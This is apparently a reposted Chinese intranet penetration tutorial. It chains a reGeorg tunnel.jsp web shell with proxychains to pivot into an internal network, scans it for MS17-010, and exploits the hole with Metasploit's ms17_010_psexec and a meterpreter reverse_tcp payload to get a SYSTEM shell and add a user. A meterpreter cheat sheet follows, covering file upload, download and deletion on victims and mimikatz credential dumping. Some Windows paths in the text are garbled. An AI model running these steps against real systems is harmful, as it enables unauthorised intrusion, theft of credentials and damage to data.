内网渗透_reGeorg+proxychains

过程演示

测试前提是目标服务器已经getshell。
1.将 reGeorgSocksProxy 中的 tunnel.jsp 文件放置到目标服务器web目录,查看能否正常访问(如图)。

2.设置kali的proxychains代理地址和端口(通过本地的socks5 2333端口出去)
vi /etc/proxychains.conf

3.配置好后通过 reGeory 来打通本地和目标的通道(如图显示成功连接)

4.本地所有工具都可通过目标服务器进一步攻击(这样kali的所有工具就如同全部在内网那台getshell的服务器上)
所有工具使用命令前加 proxychains

测试扫描内网ms17-010,可以看到通过代理成功发现目标网段漏洞服务器。








打穿隧道具体方法下边这篇文章有介绍

https://www.cnblogs.com/xiaoyunxiaogang/p/10939485.html

在kaili的proxychains 和 reGeorgSocksProxy配合进行代理

vim /etc/proxychains.conf

去掉dynamic_chain前面的#号

去掉最后一行socks4那行,然后添加socks5 127.0.0.1 8080(我的占用了这里是用的1080)

shift+:wq保存并退出

之后想让哪个命令或者应用通过代理直接用命令proxychains+对应的命令或者应用,例如:

proxychains firefox

启动火狐浏览器

访问我们ping不通的 192.168.238.128代理成功

用nmap进行扫描192.168.238.129/130

目标开放445端口且是XP系统

我们

使用exploit模块来进行攻击测试

use exploit/windows/smb/ms17_010_psexec

set payload windows/x64/meterpreter/reverse_tcp //###set payload windows/meterpreter/reverse_tcp### //针对目标机器使用的系统版本,目标机器32位就使用32位(去掉*64)

run返弹了一个shell

系统是system权限没进行限制

添加一个用户

下面的就自己操作了

下面是一些MSF中的常用命令

基本命令

help# 查看Meterpreter帮助

background#返回,把meterpreter后台挂起

bgkill# 杀死一个背景 meterpreter 脚本

bglist#提供所有正在运行的后台脚本的列表

bgrun#作为一个后台线程运行脚本

channel#显示活动频道

sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用

sesssions -k number #与会话进行交互

close# 关闭通道

exit# 终止 meterpreter 会话

quit# 终止 meterpreter 会话

interact id #切换进一个信道

run#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等

irb# 进入 Ruby 脚本模式

文件系统命令

cat c:oot.ini#查看文件内容,文件必须存在

del c:oot.ini #删除指定的文件

upload /root/Desktop/netcat.exe c: # 上传文件到目标机主上,如upload setup.exe C:windowssystem32

download nimeia.txt /root/Desktop/ # 下载文件到本机上如:download C:oot.ini /root/或者download C:"ProgramFiles"TencentQQUsers295******125Msg2.0.db /root/

edit c:oot.ini # 编辑文件

getlwd#打印本地目录

getwd#打印工作目录

lcd#更改本地目录

ls#列出在当前目录中的文件列表

lpwd#打印本地目录

pwd#输出工作目录

cd c: #进入目录文件下

rm file #删除文件

mkdir dier #在受害者系统上的创建目录

rmdir#受害者系统上删除目录

dir#列出目标主机的文件和文件夹信息

mv#修改目标主机上的文件名

search -d d:www -f web.config #search 文件,如search -d c: -f*.doc

meterpreter > search -f autoexec.bat #搜索文件

meterpreter > search -f sea*.bat c:xamp

enumdesktops #用户登录数

(1)下载文件

使用命令“download +file path”,将下载目标机器的相对应权限的任何路径下的文件

(2)上传文件

“upload”命令为上传文件到我们的目标机器,在图中我们上传了ll.txt到目标机器的c:pp下。

(3)查看文件

“cat filename”在当前目录下查看文件内容,输入命令后便会返回给我们所查看文件的内容。

mimikatz模块:

meterpreter > load mimikatz #加载mimikatz

meterpreter > msv #获取hash值

meterpreter > kerberos #获取明文

meterpreter >ssp #获取明文信息

meterpreter > wdigest #获取系统账户信息

meterpreter >mimikatz_command -f a:: #必须要以错误的模块来让正确的模块显示

meterpreter >mimikatz_command -f hash:: #获取目标 hash

meterpreter > mimikatz_command -f samdump::hashes

meterpreter > mimikatz_command -f sekurlsa::searchPasswords

原文地址:https://www.cnblogs.com/FSHOU/p/12523912.html